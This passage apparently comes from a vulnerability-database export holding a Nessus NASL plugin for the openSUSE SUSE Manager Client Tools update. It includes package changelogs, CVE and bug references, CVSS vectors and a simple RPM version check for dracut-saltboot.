Prometheus: Fix when adding label for metrics which\n contains colons in Explore. #16760, @tolwi\n\n + SinglestatPanel: Remove background color when value\n turns null. #17552 1, @druggieri\n\n - Make phantomjs dependency configurable\n\n - Create plugin directory and clean up (create in\n %install, add to %files) handling of /var/lib/grafana/*\n and\n\nkoan :\n\n - Calculate relative path for kernel and inited when\n generating grub entry (bsc#1170231)\n\n - Fix os-release version detection for SUSE\n\nmgr-cfg :\n\n - Remove commented code in test files\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Add mgr manpage links\n\nmgr-custom-info :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-daemon :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix systemd timer configuration on SLE12 (bsc#1142038)\n\nmgr-osad :\n\n - Separate osa-dispatcher and jabberd so it can be\n disabled independently\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Move /usr/share/rhn/config-defaults to uyuni-base-common\n\n - Require uyuni-base-common for /etc/rhn (for\n osa-dispatcher)\n\n - Ensure bytes type when using hashlib to avoid traceback\n (bsc#1138822)\n\nmgr-push :\n\n - Replace spacewalk-usix and spacewalk-backend-libs with\n uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-virtualization :\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix mgr-virtualization timer\n\nrhnlib :\n\n - Fix building\n\n - Fix malformed XML response when data contains non-ASCII\n chars (bsc#1154968)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix bootstrapping SLE11SP4 trad client with SSL enabled\n (bsc#1148177)\n\nspacecmd :\n\n - Only report real error, not result (bsc#1171687)\n\n - Use defined return values for spacecmd methods so\n scripts can check for failure (bsc#1171687)\n\n - Disable globbing for api subcommand to allow wildcards\n in filter settings (bsc#1163871)\n\n - Bugfix: attempt to purge SSM when it is empty\n (bsc#1155372)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Prevent error when piping stdout in Python 2\n (bsc#1153090)\n\n - Java api expects content as encoded string instead of\n encoded bytes like before (bsc#1153277)\n\n - Enable building and installing for Ubuntu 16.04 and\n Ubuntu 18.04\n\n - Add unit test for schedule, errata, user, utils, misc,\n configchannel and kickstart modules\n\n - Multiple minor bugfixes alongside the unit tests\n\n - Bugfix: referenced variable before assignment.\n\n - Add unit test for report, package, org, repo and group\n\nspacewalk-client-tools :\n\n - Add workaround for uptime overflow to\n spacewalk-update-status as well (bsc#1165921)\n\n - Spell correctly 'successful' and 'successfully'\n\n - Skip dmidecode data on aarch64 to prevent coredump\n (bsc#1113160)\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Return a non-zero exit status on errors in rhn_check\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Make a explicit requirement to systemd for\n spacewalk-client-tools when rhnsd timer is installed\n\nspacewalk-koan :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Require commands we use in merge-rd.sh\n\nspacewalk-oscap :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nspacewalk-remote-utils :\n\n - Update spacewalk-create-channel with RHEL 7.7 channel\n definitions\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsupportutils-plugin-susemanager-client :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsuseRegisterInfo :\n\n - SuseRegisterInfo only needs perl-base, not full perl\n (bsc#1168310)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nzypp-plugin-spacewalk :\n\n - 1.0.7\n\n - Prevent issue with non-ASCII characters in Python 2\n systems (bsc#1172462)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1113160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1138822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1142038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1148177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1153090\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1153277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1154940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1154968\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1155372\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1165921\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1168310\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172462\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected SUSE Manager Client Tools package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dracut-saltboot\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"dracut-saltboot-0.1.1590413773.a959db7-lp152.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dracut-saltboot\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:dracut-saltboot"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T02:11:31", "differentElements": ["cpe", "cvss2", "cvss3", "description", "exploitAvailable", "exploitEase", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 5}, {"bulletin": {"id": "OPENSUSE-2020-1105.NASL", "hash": "5230c1f9c7ef8aa393723a858ca20e61", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)", "description": "This update fixes the following issues :\n\ndracut-saltboot :\n\n - Print a list of available disk devices (bsc#1170824)\n\n - Install wipefs to initrd\n\n - Force install crypt modules\n\ngolang-github-prometheus-prometheus :\n\n - Update change log and spec file\n\n + Modified spec file: default to golang 1.14 to avoid 'have choice' build issues in OBS. \n\n + Rebase and update patches for version 2.18.0\n\n - Update to 2.18.0 \n\n + Features \n\n - Tracing: Added experimental Jaeger support #7148\n\n + Changes\n\n - Federation: Only use local TSDB for federation (ignore remote read). #7096\n\n - Rules: `rule_evaluations_total` and `rule_evaluation_failures_total` have a `rule_group` label now. #7094\n\n + Enhancements\n\n - TSDB: Significantly reduce WAL size kept around after a block cut. #7098\n\n - Discovery: Add `architecture` meta label for EC2. #7000\n\n + Bug fixes\n\n - UI: Fixed wrong MinTime reported by /status. #7182\n\n - React UI: Fixed multiselect legend on OSX. #6880\n\n - Remote Write: Fixed blocked resharding edge case. #7122\n\n - Remote Write: Fixed remote write not updating on relabel configs change. #7073\n\n - Changes from 2.17.2\n\n + Bug fixes\n\n - Federation: Register federation metrics #7081\n\n - PromQL: Fix panic in parser error handling #7132\n\n - Rules: Fix reloads hanging when deleting a rule group that is being evaluated #7138\n\n - TSDB: Fix a memory leak when prometheus starts with an empty TSDB WAL #7135\n\n - TSDB: Make isolation more robust to panics in web handlers #7129 #7136\n\n - Changes from 2.17.1\n\n + Bug fixes\n\n - TSDB: Fix query performance regression that increased memory and CPU usage #7051\n\n - Changes from 2.17.0\n\n + Features \n\n - TSDB: Support isolation #6841\n\n - This release implements isolation in TSDB. API queries and recording rules are guaranteed to only see full scrapes and full recording rules. This comes with a certain overhead in resource usage. Depending on the situation, there might be some increase in memory usage, CPU usage, or query latency.\n\n + Enhancements\n\n - PromQL: Allow more keywords as metric names #6933\n\n - React UI: Add normalization of localhost URLs in targets page #6794\n\n - Remote read: Read from remote storage concurrently #6770\n\n - Rules: Mark deleted rule series as stale after a reload #6745\n\n - Scrape: Log scrape append failures as debug rather than warn #6852\n\n - TSDB: Improve query performance for queries that partially hit the head #6676\n\n - Consul SD: Expose service health as meta label #5313\n\n - EC2 SD: Expose EC2 instance lifecycle as meta label #6914\n\n - Kubernetes SD: Expose service type as meta label for K8s service role #6684\n\n - Kubernetes SD: Expose label_selector and field_selector #6807\n\n - Openstack SD: Expose hypervisor id as meta label #6962\n\n + Bug fixes\n\n - PromQL: Do not escape HTML-like chars in query log #6834 #6795\n\n - React UI: Fix data table matrix values #6896\n\n - React UI: Fix new targets page not loading when using non-ASCII characters #6892\n\n - Remote read: Fix duplication of metrics read from remote storage with external labels #6967 #7018\n\n - Remote write: Register WAL watcher and live reader metrics for all remotes, not just the first one #6998\n\n - Scrape: Prevent removal of metric names upon relabeling #6891\n\n - Scrape: Fix 'superfluous response.WriteHeader call' errors when scrape fails under some circonstances #6986\n\n - Scrape: Fix crash when reloads are separated by two scrape intervals #7011\n\n - Changes from 2.16.0\n\n + Features \n\n - React UI: Support local timezone on /graph #6692\n\n - PromQL: add absent_over_time query function #6490\n\n - Adding optional logging of queries to their own file #6520\n\n + Enhancements\n\n - React UI: Add support for rules page and 'Xs ago' duration displays #6503\n\n - React UI: alerts page, replace filtering togglers tabs with checkboxes #6543\n\n - TSDB: Export metric for WAL write errors #6647\n\n - TSDB: Improve query performance for queries that only touch the most recent 2h of data. #6651\n\n - PromQL: Refactoring in parser errors to improve error messages #6634\n\n - PromQL: Support trailing commas in grouping opts #6480\n\n - Scrape: Reduce memory usage on reloads by reusing scrape cache #6670\n\n - Scrape: Add metrics to track bytes and entries in the metadata cache #6675\n\n - promtool: Add support for line-column numbers for invalid rules output #6533\n\n - Avoid restarting rule groups when it is unnecessary #6450\n\n + Bug fixes\n\n - React UI: Send cookies on fetch() on older browsers #6553\n\n - React UI: adopt grafana flot fix for stacked graphs #6603\n\n - React UI: broken graph page browser history so that back button works as expected #6659\n\n - TSDB: ensure compactionsSkipped metric is registered, and log proper error if one is returned from head.Init #6616\n\n - TSDB: return an error on ingesting series with duplicate labels #6664\n\n - PromQL: Fix unary operator precedence #6579\n\n - PromQL: Respect query.timeout even when we reach query.max-concurrency #6712\n